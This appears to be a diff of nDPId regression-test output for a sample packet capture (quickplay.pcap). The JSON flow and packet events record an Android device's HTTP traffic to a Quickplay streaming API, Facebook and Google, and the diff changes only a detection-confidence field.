02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1429000030498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030498,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVSmuUAArQbSWHgcIykKNqn6AFDF7PrHCIFBw4oPUBgIIgJuAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1429000030766,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWA50EAAPwaxUgo2qfp4HCMpxe0AUOei8\/4RmPGFUBgAc1zOAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1429000030832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030832,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVReB0AArQYbC3gcIykKNqn6AFDF7RGY8YXnovU2UBgIIvGQAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7580000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1429000031075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":358,"pkt_l4_len":322,"thread_ts_msec":1429000031075,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAVYEaUAAPwYE2wo2qfp4HAUSgSgAUG4ezi+GqNXzUBgAc8tUAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9ob21lP2FwaUtleT1xd2VydHkmZGV2aWNlPWFuZHJvaWRtb2JpbGUmbG9jYWxlPWVuZyZuZXR3b3JrPVdJRkkmcGFnZU51bWJlcj0xJnBhZ2VTaXplPTUwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiBhcGktc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7580000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/home?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7580000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/home?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1429000031382,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":109,"pkt_l4_len":73,"thread_ts_msec":1429000031382,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAF1lCkAArQY3FngcBRIKNqn6AFCBKIapX\/duHs9dUBgIImd7AAD+6U1rdHX+8GWHmWHKf1z0+O1Nfp++87\/dVNV0wP\/9v\/+n\/\/6\/AAAA\/\/8CDAD1QSSgppQFAA=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1429000031698,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000031698,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOOYfEAAPwb2VQo2qfqt\/EoWzD0AUOQgUs9KX9ElUBgAc0k5AABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1429000032158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000032158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNiNkAArAa\/H638ShYKNqn6AFDMPUpf0SXkIFOKUBgIIjgwAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogK2R4S1lRRnpNRHhKdjZkUXFVLyt4Yzd1VXVxaHpOK3BWYXpxSzdCUmswUW1oSWIxVEp3YXZ4SDRpUUV1TUVFSDVZdU80TU11R3ErWHlyOGUveHZqV2c9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMiBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1429000037314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000037314,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAONYlEAAPwY2Pgo2qfqt\/EoWzEAAUKq8lHZkd0MeUBg5CHxNAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1429000037600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":241,"pkt_l4_len":205,"thread_ts_msec":1429000037600,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOEBz0AAPwbyFAo2qfp4HBrngf0AUJlyzTdc8IHSUBgAc3meAABHRVQgL2dlbmVyYXRlXzIwNCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogY2xpZW50czMuZ29vZ2xlLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients3.google.com","url":"clients3.google.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients3.google.com","url":"clients3.google.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1429000037659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":137,"pkt_l4_len":101,"thread_ts_msec":1429000037659,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHlLmEAArQY6l3gcGucKNqn6AFCB\/VzwgdKZcs3wUBgIIqKRAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNClNlcnZlcjogR0ZFLzIuMA0KDQo="} 